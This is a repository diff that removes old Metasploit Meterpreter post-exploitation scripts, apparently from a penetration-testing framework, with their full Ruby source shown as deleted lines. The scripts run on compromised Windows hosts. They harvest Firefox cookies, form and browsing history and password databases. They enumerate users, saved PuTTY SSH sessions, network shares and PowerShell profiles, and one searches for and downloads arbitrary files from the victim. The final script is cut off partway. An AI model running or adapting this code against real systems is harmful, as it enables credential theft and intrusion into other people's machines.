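-  print_status("migrating back into PID=#{@old_pid}...")
-  client.core.migrate(@old_pid)
-  print_status("done.")
-end
-
-raise Rex::Script::Completed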
+ 0
- 292
scripts/meterpreter/enum_firefox.rb

@@ -1,292 +0,0 @@
1
-##
2
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
-# If you'd like to imporve this script, please try to port it as a post
4
-# module instead. Thank you.
5
-##
6
-
7
-
8
-#
9
-# Author: Carlos Perez at carlos_perez[at]darkoperator.com
10
-#-------------------------------------------------------------------------------
11
-################## Variable Declarations ##################
12
-require 'sqlite3'
13
-@client = client
14
-kill_frfx = false
15
-host,port = session.session_host, session.session_port
16
-# Create Filename info to be appended to downloaded files
17
-filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
18
-
19
-# Create a directory for the logs
20
-@logs = ::File.join(Msf::Config.config_directory, 'logs',"scripts", 'enum_firefox', host + filenameinfo )
21
-
22
-# logfile name
23
-logfile = @logs + "/" + host + filenameinfo + ".txt"
24
-notusrs = [
25
-  "Default",
26
-  "Default User",
27
-  "Public",
28
-  "LocalService",
29
-  "NetworkService",
30
-  "All Users"
31
-]
32
-#-------------------------------------------------------------------------------
33
-#Function for getting Firefox SQLite DB's
34
-def frfxplacesget(path,usrnm)
35
-  # Create the log
36
-  ::FileUtils.mkdir_p(@logs)
37
-  @client.fs.dir.foreach(path) {|x|
38
-    next if x =~ /^(\.|\.\.)$/
39
-    fullpath = path + '\\' + x
40
-    if @client.fs.file.stat(fullpath).directory?
41
-      frfxplacesget(fullpath,usrnm)
42
-    elsif fullpath =~ /(formhistory.sqlite|cookies.sqlite|places.sqlite|search.sqlite)/i
43
-      dst = x
44
-      dst = @logs + ::File::Separator + usrnm + dst
45
-      print_status("\tDownloading Firefox Database file #{x} to '#{dst}'")
46
-      @client.fs.file.download_file(dst, fullpath)
47
-    end
48
-  }
49
-
50
-end
51
-#-------------------------------------------------------------------------------
52
-#Function for processing the Firefox sqlite DB's
53
-def frfxdmp(usrnm)
54
-  sitesvisited = []
55
-  dnldsmade = []
56
-  bkmrks = []
57
-  cookies = []
58
-  formvals = ''
59
-  searches = ''
60
-  results = ''
61
-  placesdb = @logs + ::File::Separator + usrnm + "places.sqlite"
62
-  formdb = @logs + ::File::Separator + usrnm + "formhistory.sqlite"
63
-  searchdb = @logs + ::File::Separator + usrnm + "search.sqlite"
64
-  cookiesdb = @logs + ::File::Separator + usrnm + "cookies.sqlite"
65
-  bookmarks = @logs + ::File::Separator + usrnm + "_bookmarks.txt"
66
-  download_list = @logs + ::File::Separator + usrnm + "_download_list.txt"
67
-  url_history = @logs + ::File::Separator + usrnm + "_history.txt"
68
-  form_history = @logs + ::File::Separator + usrnm + "_form_history.txt"
69
-  search_history = @logs + ::File::Separator + usrnm + "_search_history.txt"
70
-  begin
71
-    print_status("\tGetting Firefox Bookmarks for #{usrnm}")
72
-    db = SQLite3::Database.new(placesdb)
73
-    #print_status("\tProcessing #{placesdb}")
74
-
75
-    db.execute('select a.url from moz_places a, moz_bookmarks b, '+
76
-      'moz_bookmarks_roots c where a.id=b.fk and parent=2'+
77
-      ' and folder_id=2 and a.hidden=0') do |row|
78
-      bkmrks << row
79
-    end
80
-    print_status("\tSaving to #{bookmarks}")
81
-    if bkmrks.length != 0
82
-      bkmrks.each do |b|
83
-        file_local_write(bookmarks,"\t#{b.to_s}\n")
84
-      end
85
-    else
86
-      print_status("\tIt appears that there are no bookmarks for this account")
87
-    end
88
-  rescue::Exception => e
89
-    print_status("The following Error was encountered: #{e.class} #{e}")
90
-  end
91
-  #--------------------------------------------------------------------------
92
-  begin
93
-    print_status("\tGetting list of Downloads using Firefox made by #{usrnm}")
94
-    db.execute('SELECT url FROM moz_places, moz_historyvisits ' +
95
-      'WHERE moz_places.id = moz_historyvisits.place_id '+
96
-      'AND visit_type = "7" ORDER by visit_date') do |row|
97
-      dnldsmade << row
98
-    end
99
-    print_status("\tSaving Download list to #{download_list}")
100
-    if dnldsmade.length != 0
101
-      dnldsmade.each do |d|
102
-        file_local_write(download_list,"\t#{d.to_s} \n")
103
-      end
104
-    else
105
-      print_status("\tIt appears that downloads where cleared for this account")
106
-    end
107
-  rescue::Exception => e
108
-    print_status("The following Error was encountered: #{e.class} #{e}")
109
-  end
110
-  #--------------------------------------------------------------------------
111
-  begin
112
-    print_status("\tGetting Firefox URL History for #{usrnm}")
113
-    db.execute('SELECT DISTINCT url FROM moz_places, moz_historyvisits ' +
114
-      'WHERE moz_places.id = moz_historyvisits.place_id ' +
115
-      'AND visit_type = "1" ORDER by visit_date' ) do |row|
116
-      sitesvisited << row
117
-    end
118
-    print_status("\tSaving URL History to #{url_history}")
119
-    if sitesvisited.length != 0
120
-      sitesvisited.each do |s|
121
-        file_local_write(url_history,"\t#{s.to_s}\n")
122
-      end
123
-    else
124
-      print_status("\tIt appears that Browser History has been cleared")
125
-    end
126
-    db.close
127
-  rescue::Exception => e
128
-    print_status("The following Error was encountered: #{e.class} #{e}")
129
-  end
130
-  #--------------------------------------------------------------------------
131
-  begin
132
-    print_status("\tGetting Firefox Form History for #{usrnm}")
133
-    db = SQLite3::Database.new(formdb)
134
-    #print_status("\tProcessing #{formdb}")
135
-    db.execute("SELECT fieldname,value FROM moz_formhistory") do |row|
136
-      formvals << "\tField: #{row[0]} Value: #{row[1]}\n"
137
-    end
138
-    print_status("\tSaving Firefox Form History to #{form_history}")
139
-    if formvals.length != 0
140
-      file_local_write(form_history,formvals)
141
-    else
142
-      print_status("\tIt appears that Form History has been cleared")
143
-    end
144
-    db.close
145
-  rescue::Exception => e
146
-    print_status("The following Error was encountered: #{e.class} #{e}")
147
-  end
148
-
149
-  begin
150
-    print_status("\tGetting Firefox Search History for #{usrnm}")
151
-    db = SQLite3::Database.new(searchdb)
152
-    #print_status("\tProcessing #{searchdb}")
153
-    db.execute("SELECT name,value FROM engine_data") do |row|
154
-      searches << "\tField: #{row[0]} Value: #{row[1]}\n"
155
-    end
156
-    print_status("\tSaving Firefox Search History to #{search_history}")
157
-    if searches.length != 0
158
-      file_local_write(search_history,searches)
159
-    else
160
-      print_status("\tIt appears that Search History has been cleared")
161
-    end
162
-    db.close
163
-  rescue::Exception => e
164
-    print_status("The following Error was encountered: #{e.class} #{e}")
165
-  end
166
-  # Create Directory for dumping Firefox cookies
167
-  ckfldr = ::File.join(@logs,"firefoxcookies_#{usrnm}")
168
-  ::FileUtils.mkdir_p(ckfldr)
169
-  db = SQLite3::Database.new(cookiesdb)
170
-  db.results_as_hash = true
171
-  print_status("\tGetting Firefox Cookies for #{usrnm}")
172
-  db.execute("SELECT * FROM moz_cookies;" ) do |item|
173
-    fd = ::File.new(ckfldr + ::File::Separator + item['id'].to_s + "_" + item['host'].to_s + ".txt", "w+")
174
-    fd.puts "Name: " + item['name'] + "\n"
175
-    fd.puts "Value: " + item['value'].to_s + "\n"
176
-    fd.puts "Host: " + item['host'] + "\n"
177
-    fd.puts "Path: " + item['path'] + "\n"
178
-    fd.puts "Expiry: " + item['expiry'].to_s + "\n"
179
-    fd.puts "lastAccessed: " + item['lastAccessed'].to_s + "\n"
180
-    fd.puts "isSecure: " + item['isSecure'].to_s + "\n"
181
-    fd.puts "isHttpOnly: " + item['isHttpOnly'].to_s + "\n"
182
-    fd.close
183
-  end
184
-  return results
185
-end
186
-#-------------------------------------------------------------------------------
187
-#Function for getting password files
188
-def frfxpswd(path,usrnm)
189
-  @client.fs.dir.foreach(path) {|x|
190
-    next if x =~ /^(\.|\.\.)$/
191
-    fullpath = path + '\\' + x
192
-
193
-    if @client.fs.file.stat(fullpath).directory?
194
-      frfxpswd(fullpath,usrnm)
195
-    elsif fullpath =~ /(cert8.db|signons.sqlite|signons3.txt|key3.db)/i
196
-      begin
197
-        dst = x
198
-        dst = @logs + ::File::Separator + usrnm + dst
199
-        print_status("\tDownloading Firefox Password file to '#{dst}'")
200
-        @client.fs.file.download_file(dst, fullpath)
201
-      rescue
202
-        print_error("\t******Failed to download file #{x}******")
203
-        print_error("\t******Browser could be running******")
204
-      end
205
-    end
206
-  }
207
-
208
-end
209
-#-------------------------------------------------------------------------------
210
-# Function for checking if Firefox is installed
211
-def frfxchk
212
-  found = false
213
-  registry_enumkeys("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall").each do |a|
214
-    if a =~ /Firefox/
215
-      print_status("Firefox was found on this system.")
216
-      found = true
217
-    end
218
-  end
219
-  return found
220
-end
221
-#-------------------------------------------------------------------------------
222
-#Function for executing all pilfering actions for Firefox
223
-def frfxpilfer(frfoxdbloc,session,logs,usrnm,logfile)
224
-  print_status("Getting Firefox information for user #{usrnm}")
225
-  frfxplacesget(frfoxdbloc,usrnm)
226
-  frfxpswd(frfoxdbloc,usrnm)
227
-  file_local_write(logfile,frfxdmp(usrnm))
228
-end
229
-
230
-# Function to kill Firefox if open
231
-def kill_firefox
232
-  print_status("Killing the Firefox Process if open...")
233
-  @client.sys.process.get_processes().each do |x|
234
-    if x['name'].downcase == "firefox.exe"
235
-      print_status("\tFirefox Process found #{x['name']} #{x['pid']}")
236
-      print_status("\tKilling process .....")
237
-      session.sys.process.kill(x['pid'])
238
-    end
239
-  end
240
-end
241
-####################### Options ###########################
242
-@@exec_opts = Rex::Parser::Arguments.new(
243
-  "-h" => [ false, "Help menu." ],
244
-  "-k" => [ false, "Kill Firefox processes before downloading databases for enumeration."]
245
-
246
-)
247
-@@exec_opts.parse(args) { |opt, idx, val|
248
-  case opt
249
-  when "-h"
250
-    print_line "Meterpreter Script for extracting Firefox Browser."
251
-    print_line(@@exec_opts.usage)
252
-    raise Rex::Script::Completed
253
-  when "-k"
254
-    kill_frfx = true
255
-  end
256
-}
257
-if client.platform =~ /win32|win64/
258
-  if frfxchk
259
-    user = @client.sys.config.getuid
260
-    if not is_system?
261
-      envs = @client.sys.config.getenvs('USERNAME', 'APPDATA')
262
-      usrname = envs['USERNAME']
263
-      db_path = envs['APPDATA'] + "\\Mozilla\\Firefox\\Profiles"
264
-      if kill_frfx
265
-        kill_firefox
266
-      end
267
-      print_status("Extracting Firefox data for user #{usrname}")
268
-      frfxpswd(db_path,usrname)
269
-      frfxplacesget(db_path,usrname)
270
-      frfxdmp(usrname)
271
-    else
272
-      registry_enumkeys("HKU").each do |sid|
273
-        if sid =~ /S-1-5-21-\d*-\d*-\d*-\d{4}$/
274
-          key_base = "HKU\\#{sid}"
275
-          usrname = Rex::FileUtils.clean_path(registry_getvaldata("#{key_base}\\Volatile Environment","USERNAME"))
276
-          db_path = registry_getvaldata("#{key_base}\\Volatile Environment","APPDATA") + "\\Mozilla\\Firefox\\Profiles"
277
-          if kill_frfx
278
-            kill_firefox
279
-          end
280
-          print_status("Extracting Firefox data for user #{usrname}")
281
-          frfxpswd(db_path,usrname)
282
-          frfxplacesget(db_path,usrname)
283
-          frfxdmp(usrname)
284
-        end
285
-      end
286
-    end
287
-
288
-  end
289
-else
290
-  print_error("This version of Meterpreter is not supported with this Script!")
291
-  raise Rex::Script::Completed
292
-end

+ 0
- 101
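--- a/scripts/meterpreter/enum_logged_on_users.rb
+++ /dev/null
@@ -1,101 +0,0 @@
-##
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
-# If you'd like to imporve this script, please try to port it as a post
-# module instead. Thank you.
-##
-
-
-# Author: Carlos Perez at carlos_perez[at]darkoperator.com
-#-------------------------------------------------------------------------------
-################## Variable Declarations ##################
-@client = client
-#-------------------------------------------------------------------------------
-
-######################## Functions ########################
-def ls_logged
-  sids = []
-  sids << registry_enumkeys("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList")
-  tbl = Rex::Text::Table.new(
-      'Header'  => "Logged Users",
-      'Indent'  => 1,
-      'Columns' =>
-        [
-          "SID",
-          "Profile Path"
-        ])
-  sids.flatten.each do |sid|
-    profile_path = registry_getvaldata("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList\\#{sid}","ProfileImagePath")
-    tbl << [sid,profile_path]
-  end
-  print_line("\n" + tbl.to_s + "\n")
-end
-
-def ls_current
-  key_base, username = "",""
-  tbl = Rex::Text::Table.new(
-      'Header'  => "Current Logged Users",
-      'Indent'  => 1,
-      'Columns' =>
-        [
-          "SID",
-          "User"
-        ])
-  registry_enumkeys("HKU").each do |sid|
-    case sid
-    when "S-1-5-18"
-      username = "SYSTEM"
-      tbl << [sid,username]
-    when "S-1-5-19"
-      username = "Local Service"
-      tbl << [sid,username]
-    when "S-1-5-20"
-      username = "Network Service"
-      tbl << [sid,username]
-    else
-      if sid =~ /S-1-5-21-\d*-\d*-\d*-\d*$/
-      key_base = "HKU\\#{sid}"
-      os = @client.sys.config.sysinfo['OS']
-      if os =~ /(Windows 7|2008|Vista)/
-        username = registry_getvaldata("#{key_base}\\Volatile Environment","USERNAME")
-      elsif os =~ /(2000|NET|XP)/
-        appdata_var = registry_getvaldata("#{key_base}\\Volatile Environment","APPDATA")
-        username = ''
-        if appdata_var =~ /^\w\:\D*\\(\D*)\\\D*$/
-          username = $1
-        end
-      end
-      tbl << [sid,username]
-      end
-    end
-  end
-  print_line("\n" + tbl.to_s + "\n")
-end
-#-------------------------------------------------------------------------------
-####################### Options ###########################
-@@exec_opts = Rex::Parser::Arguments.new(
-  "-h" => [ false, "Help menu." ],
-  "-l" => [ false, "List SID's of users who have loged in to the host." ],
-  "-c" => [ false, "List SID's of currently loged on users." ]
-  )
-@@exec_opts.parse(args) { |opt, idx, val|
-  case opt
-  when "-h"
-    print_line "Meterpreter Script for enumerating Current logged users and users that have loged in to the system."
-    print_line(@@exec_opts.usage)
-    raise Rex::Script::Completed
-  when "-l"
-    ls_logged
-  when "-c"
-    ls_current
-  end
-}
-if client.platform =~ /win32|win64/
-  if args.length == 0
-    print_line "Meterpreter Script for enumerating Current logged users and users that have loged in to the system."
-    print_line(@@exec_opts.usage)
-    raise Rex::Script::Completed
-  end
-else
-  print_error("This version of Meterpreter is not supported with this Script!")
-  raise Rex::Script::Completed
-end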

+ 0
- 132
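--- a/scripts/meterpreter/enum_powershell_env.rb
+++ /dev/null
@@ -1,132 +0,0 @@
-##
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
-# If you'd like to imporve this script, please try to port it as a post
-# module instead. Thank you.
-##
-
-
-#Meterpreter script for enumerating Microsoft Powershell settings.
-#Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com
-@client = client
-
-@@exec_opts = Rex::Parser::Arguments.new(
-  "-h" => [ false,"Help menu." ]
-)
-
-@@exec_opts.parse(args) { |opt, idx, val|
-  case opt
-  when "-h"
-    print_line("enum_scripting_env -- Enumerates PowerShell and WSH Configurations")
-    print_line("USAGE: run enum_scripting_env")
-    print_line(@@exec_opts.usage)
-    raise Rex::Script::Completed
-  end
-}
-#Support Functions
-#-------------------------------------------------------------------------------
-def enum_users
-  os = @client.sys.config.sysinfo['OS']
-  users = []
-  user = @client.sys.config.getuid
-  path4users = ""
-  sysdrv = @client.sys.config.getenv('SystemDrive')
-
-  if os =~ /Windows 7|Vista|2008/
-    path4users = sysdrv + "\\Users\\"
-    profilepath = "\\Documents\\WindowsPowerShell\\"
-  else
-    path4users = sysdrv + "\\Documents and Settings\\"
-    profilepath = "\\My Documents\\WindowsPowerShell\\"
-  end
-
-  if is_system?
-    print_status("Running as SYSTEM extracting user list..")
-    @client.fs.dir.foreach(path4users) do |u|
-      userinfo = {}
-      next if u =~ /^(\.|\.\.|All Users|Default|Default User|Public|desktop.ini|LocalService|NetworkService)$/
-      userinfo['username'] = u
-      userinfo['userappdata'] = path4users + u + profilepath
-      users << userinfo
-    end
-  else
-    userinfo = {}
-    uservar = @client.sys.config.getenv('USERNAME')
-    userinfo['username'] = uservar
-    userinfo['userappdata'] = path4users + uservar + profilepath
-    users << userinfo
-  end
-  return users
-end
-
-
-
-#-------------------------------------------------------------------------------
-def enum_powershell
-  #Check if PowerShell is Installed
-  if registry_enumkeys("HKLM\\SOFTWARE\\Microsoft\\").include?("PowerShell")
-    print_status("Powershell is Installed on this system.")
-    powershell_version = registry_getvaldata("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\PowerShellEngine","PowerShellVersion")
-    print_status("Version: #{powershell_version}")
-    #Get PowerShell Execution Policy
-    begin
-      powershell_policy = registry_getvaldata("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell","ExecutionPolicy")
-    rescue
-      powershell_policy = "Restricted"
-    end
-    print_status("Execution Policy: #{powershell_policy}")
-    powershell_path = registry_getvaldata("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell","Path")
-    print_status("Path: #{powershell_path}")
-    if registry_enumkeys("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1").include?("PowerShellSnapIns")
-      print_status("Powershell Snap-Ins:")
-      registry_enumkeys("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\PowerShellSnapIns").each do |si|
-        print_status("\tSnap-In: #{si}")
-        registry_enumvals("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\PowerShellSnapIns\\#{si}").each do |v|
-          print_status("\t\t#{v}: #{registry_getvaldata("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\PowerShellSnapIns\\#{si}",v)}")
-        end
-      end
-    else
-      print_status("No PowerShell Snap-Ins are installed")
-
-    end
-    if powershell_version =~ /2./
-      print_status("Powershell Modules:")
-      powershell_module_path = @client.sys.config.getenv('PSModulePath')
-      @client.fs.dir.foreach(powershell_module_path) do |m|
-        next if m =~ /^(\.|\.\.)$/
-        print_status("\t#{m}")
-      end
-    end
-    tmpout = []
-    print_status("Checking if users have Powershell profiles")
-    enum_users.each do |u|
-      print_status("Checking #{u['username']}")
-      begin
-      @client.fs.dir.foreach(u["userappdata"]) do |p|
-        next if p =~ /^(\.|\.\.)$/
-        if p =~ /Microsoft.PowerShell_profile.ps1/
-          ps_profile = session.fs.file.new("#{u["userappdata"]}Microsoft.PowerShell_profile.ps1", "rb")
-          until ps_profile.eof?
-            tmpout << ps_profile.read
-          end
-          ps_profile.close
-          if tmpout.length == 1
-            print_status("Profile for #{u["username"]} not empty, it contains:")
-            tmpout.each do |l|
-              print_status("\t#{l.strip}")
-            end
-          end
-        end
-      end
-      rescue
-      end
-    end
-
-
-  end
-end
-if client.platform =~ /win32|win64/
-  enum_powershell
-else
-  print_error("This version of Meterpreter is not supported with this Script!")
-  raise Rex::Script::Completed
-end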

+ 0
- 104
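--- a/scripts/meterpreter/enum_putty.rb
+++ /dev/null
@@ -1,104 +0,0 @@
-##
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
-# If you'd like to imporve this script, please try to port it as a post
-# module instead. Thank you.
-##
-
-
-#
-# Meterpreter script for enumerating putty connections
-# Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com
-#
-@client = client
-#Options and Option Parsing
-opts = Rex::Parser::Arguments.new(
-  "-h" => [ false, "Help menu." ]
-)
-
-opts.parse(args) { |opt, idx, val|
-  case opt
-  when "-h"
-    print_line "Meterpreter Script for enumerating Putty Configuration."
-    print_line(opts.usage)
-    raise Rex::Script::Completed
-  end
-}
-
-def hkcu_base
-  key_base = []
-
-  if not is_system?
-    key_base << "HKCU"
-  else
-    key = "HKU\\"
-    root_key, base_key = @client.sys.registry.splitkey(key)
-    open_key = @client.sys.registry.open_key(root_key, base_key)
-    keys = open_key.enum_key
-    keys.each do |k|
-      if k =~ /S-1-5-21-\d*-\d*-\d*-\d*$/
-        key_base << "HKU\\#{k}"
-      end
-    end
-  end
-  return key_base
-end
-def check_putty(reg_key_base)
-  installed = false
-  app_list = []
-  app_list = registry_enumkeys("#{reg_key_base}\\Software")
-  os = @client.sys.config.sysinfo['OS']
-  if os =~ /(Windows 7|2008|Vista)/
-    username_profile = registry_getvaldata("#{reg_key_base}\\Volatile Environment","USERNAME")
-  elsif os =~ /(2000|NET|XP)/
-    appdata_var = registry_getvaldata("#{reg_key_base}\\Volatile Environment","APPDATA")
-    username_profile = appdata_var.scan(/^\w\:\D*\\(\D*)\\\D*$/)
-  end
-  if app_list.index("SimonTatham")
-    print_status("Putty Installed for #{username_profile}")
-    installed = true
-  end
-  return installed
-end
-
-def enum_known_ssh_hosts(reg_key_base)
-  print_status("Saved SSH Server Public Keys:")
-  registry_enumvals("#{reg_key_base}\\Software\\SimonTatham\\PuTTY\\SshHostKeys").each do |host|
-    print_status("\t#{host}")
-  end
-end
-
-def enum_saved_sessions(reg_key_base)
-  saved_sessions = []
-  sessions_protocol = ""
-  sessions_key = "#{reg_key_base}\\Software\\SimonTatham\\PuTTY\\Sessions"
-  saved_sessions = registry_enumkeys(sessions_key)
-  if saved_sessions.length > 0
-    saved_sessions.each do |saved_session|
-      print_status("Session #{saved_session}:")
-      sessions_protocol = registry_getvaldata(sessions_key+"\\"+saved_session,"Protocol")
-      if sessions_protocol =~ /ssh/
-        print_status("\tProtocol: SSH")
-        print_status("\tHostname: #{registry_getvaldata(sessions_key+"\\"+saved_session,"HostName")}")
-        print_status("\tUsername: #{registry_getvaldata(sessions_key+"\\"+saved_session,"UserName")}")
-        print_status("\tPublic Key: #{registry_getvaldata(sessions_key+"\\"+saved_session,"PublicKeyFile")}")
-      elsif sessions_protocol =~ /serial/
-        print_status("\tProtocol: Serial")
-        print_status("\tSerial Port: #{registry_getvaldata(sessions_key+"\\"+saved_session,"SerialLine")}")
-        print_status("\tSpeed: #{registry_getvaldata(sessions_key+"\\"+saved_session,"SerialSpeed")}")
-        print_status("\tData Bits: #{registry_getvaldata(sessions_key+"\\"+saved_session,"SerialDataBits")}")
-        print_status("\tFlow Control: #{registry_getvaldata(sessions_key+"\\"+saved_session,"SerialFlowControl")}")
-      end
-    end
-  end
-end
-if client.platform =~ /win32|win64/
-  hkcu_base.each do |hkb|
-    if check_putty(hkb)
-      enum_known_ssh_hosts(hkb)
-      enum_saved_sessions(hkb)
-    end
-  end
-else
-  print_error("This version of Meterpreter is not supported with this Script!")
-  raise Rex::Script::Completed
-end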

+ 0
- 124
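--- a/scripts/meterpreter/enum_shares.rb
+++ /dev/null
@@ -1,124 +0,0 @@
-##
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
-# If you'd like to imporve this script, please try to port it as a post
-# module instead. Thank you.
-##
-
-
-
-# Author: Carlos Perez at carlos_perez[at]darkoperator.com
-#-------------------------------------------------------------------------------
-################## Variable Declarations ##################
-opts = Rex::Parser::Arguments.new(
-  "-h" => [ false, "Help menu." ]
-  )
-
-opts.parse(args) { |opt, idx, val|
-  case opt
-  when "-h"
-    print_line "Meterpreter Script for Enumerating Shares Offered, History of Mounted Shares,"
-    print_line "History of UNC Paths entered in Run Dialog."
-    print_line(opts.usage)
-    raise Rex::Script::Completed
-  end
-}
-
-# Function for enumerating recent mapped drives on target machine
-def enum_recent_mounts(base_key)
-  recent_mounts = []
-  partial_path = base_key + '\Software\\Microsoft\Windows\CurrentVersion\Explorer'
-  full_path = "#{partial_path}\\Map Network Drive MRU"
-  explorer_keys = registry_enumkeys(partial_path)
-  if explorer_keys.include?("Map Network Drive MRU")
-    registry_enumvals(full_path).each do |k|
-      if not k =~ /MRUList/
-        recent_mounts << registry_getvaldata(full_path,k)
-      end
-    end
-  end
-  return recent_mounts
-end
-
-# Function for enumerating UNC Paths entered in run dialog box
-def enum_run_unc(base_key)
-  unc_paths = []
-  full_path = base_key + '\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU'
-  registry_enumvals(full_path).each do |k|
-    if k =~ /./
-      run_entrie = registry_getvaldata(full_path,k)
-      unc_paths << run_entrie if run_entrie =~ /^\\\\/
-    end
-  end
-  return unc_paths
-end
-
-def enum_conf_shares()
-  target_os = client.sys.config.sysinfo['OS']
-  if target_os =~ /Windows 7|Vista|2008/
-    shares_key = 'HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\LanmanServer\\Shares'
-  else
-    shares_key = 'HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\lanmanserver\\Shares'
-  end
-  shares = registry_enumvals(shares_key)
-  if shares.length > 0
-    print_status()
-    print_status("The following shares where found:")
-    shares.each do |s|
-      share_info = registry_getvaldata(shares_key,s).split("\000")
-      print_status("\tName: #{s}")
-      share_info.each do |e|
-        name,val = e.split("=")
-        print_status("\t#{name}: #{val}") if name =~ /Path|Type/
-      end
-      print_status()
-    end
-  end
-end
-
-if client.platform =~ /win32|64/
-  # Variables to hold info
-  mount_history = []
-  run_history = []
-
-  # Enumerate shares being offered
-  enum_conf_shares()
-
-  if not is_system?
-    mount_history = enum_recent_mounts("HKEY_CURRENT_USER")
-    run_history = enum_run_unc("HKEY_CURRENT_USER")
-  else
-    user_sid = []
-    key = "HKU\\"
-    root_key, base_key = client.sys.registry.splitkey(key)
-    open_key = client.sys.registry.open_key(root_key, base_key)
-    keys = open_key.enum_key
-    keys.each do |k|
-      user_sid << k if k =~ /S-1-5-21-\d*-\d*-\d*-\d{3,6}$/
-    end
-    user_sid.each do |us|
-      mount_history = mount_history + enum_recent_mounts("HKU\\#{us.chomp}")
-      run_history = run_history + enum_run_unc("HKU\\#{us.chomp}")
-    end
-  end
-
-  # Enumerate Mount History
-  if mount_history.length > 0
-    print_status("Recent Mounts found:")
-    mount_history.each do |i|
-      print_status("\t#{i}")
-    end
-    print_status()
-  end
-
-  #Enumerate UNC Paths entered in the Dialog box
-  if run_history.length > 0
-    print_status("Recent UNC paths entered in Run Dialog found:")
-    run_history.each do |i|
-      print_status("\t#{i}")
-    end
-    print_status()
-  end
-else
-  print_error("This version of Meterpreter is not supported with this Script!")
-  raise Rex::Script::Completed
-end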

+ 0
- 87
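--- a/scripts/meterpreter/file_collector.rb
+++ /dev/null
@@ -1,87 +0,0 @@
-##
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
-# If you'd like to imporve this script, please try to port it as a post
-# module instead. Thank you.
-##
-
-
-# Author: Carlos Perez at carlos_perez[at]darkoperator.com
-#-------------------------------------------------------------------------------
-@client = client
-location = nil
-search_blob = []
-input_file = nil
-output_file = nil
-recurse = false
-logs = nil
-@opts = Rex::Parser::Arguments.new(
-  "-h" => [false, "Help menu." ],
-  "-i" => [true, "Input file with list of files to download, one per line."],
-  "-d" => [true, "Directory to start search on, search will be recursive."],
-  "-f" => [true, "Search blobs separated by a |."],
-  "-o" => [true, "Output File to save the full path of files found."],
-  "-r" => [false, "Search subdirectories."],
-  "-l" => [true, "Location where to save the files."]
-)
-# Function for displaying help message
-def usage
-  print_line "Meterpreter Script for searching and downloading files that"
-  print_line "match a specific pattern. First save files to a file, edit and"
-  print_line("use that same file to download the choosen files.")
-  print_line(@opts.usage)
-  raise Rex::Script::Completed
-end
-
-# Check that we are running under the right type of Meterpreter
-if client.platform =~ /win32|win64/
-  # Parse the options
-  if args.length > 0
-    @opts.parse(args) { |opt, idx, val|
-      case opt
-      when "-h"
-        usage
-      when "-i"
-        input_file = val
-      when "-o"
-        output_file = val
-      when "-d"
-        location = val
-      when "-f"
-        search_blob = val.split("|")
-      when "-r"
-        recurse = true
-      when "-l"
-        logs = val
-      end
-    }
-    # Search for files and save their location if specified
-    if search_blob.length > 0 and location
-      search_blob.each do |s|
-        print_status("Searching for #{s}")
-        results = @client.fs.file.search(location,s,recurse)
-        results.each do |file|
-          print_status("\t#{file['path']}\\#{file['name']} (#{file['size']} bytes)")
-          file_local_write(output_file,"#{file['path']}\\#{file['name']}") if output_file
-        end
-      end
-    end
-    # Read log file and download those files found
-    if input_file and logs
-      if ::File.exist?(input_file)
-        print_status("Reading file #{input_file}")
-        print_status("Downloading to #{logs}")
-        ::File.open(input_file, "r").each_line do |line|
-          print_status("\tDownloading #{line.chomp}")
-          @client.fs.file.download(logs, line.chomp)
-        end
-      else
-        print_error("File #{input_file} does not exist!")
-      end
-    end
-  else
-    usage
-  end
-else
-  print_error("This version of Meterpreter is not supported with this Script!")
-  raise Rex::Script::Completed
-end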

+ 0
- 70
scripts/meterpreter/get_application_list.rb

@@ -1,70 +0,0 @@
1
-##
2
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
-# If you'd like to imporve this script, please try to port it as a post
4
-# module instead. Thank you.
5
-##
6
-
7
-
8
-# Meterpreter script for listing installed applications and their version.
9
-# Provided: carlos_perez[at]darkoperator[dot]com
10
-
11
-#Options and Option Parsing
12
-opts = Rex::Parser::Arguments.new(
13
-  "-h" => [ false, "Help menu." ]
14
-)
15
-
16
-def app_list
17
-  tbl = Rex::Text::Table.new(
18
-    'Header'  => "Installed Applications",
19
-    'Indent'  => 1,
20
-    'Columns' => [
21
-      "Name",
22
-      "Version"
23
-    ])
24
-  appkeys = ['HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall',
25
-    'HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall' ]
26
-  threadnum = 0
27
-  a = []
28
-  appkeys.each do |keyx86|
29
-    soft_keys = registry_enumkeys(keyx86)
30
-    if soft_keys
31
-      soft_keys.each do |k|
32
-        if threadnum < 10
33
-          a.push(::Thread.new {
34
-              begin
35
-                dispnm = registry_getvaldata("#{keyx86}\\#{k}","DisplayName")
36
-                dispversion = registry_getvaldata("#{keyx86}\\#{k}","DisplayVersion")
37
-                if dispnm =~ /\S*/
38
-                  tbl << [dispnm,dispversion]
39
-                end
40
-              rescue
41
-              end
42
-            })
43
-          threadnum += 1
44
-        else
45
-          sleep(0.05) and a.delete_if {|x| not x.alive?} while not a.empty?
46
-          threadnum = 0
47
-        end
48
-      end
49
-    end
50
-
51
-
52
-  end
53
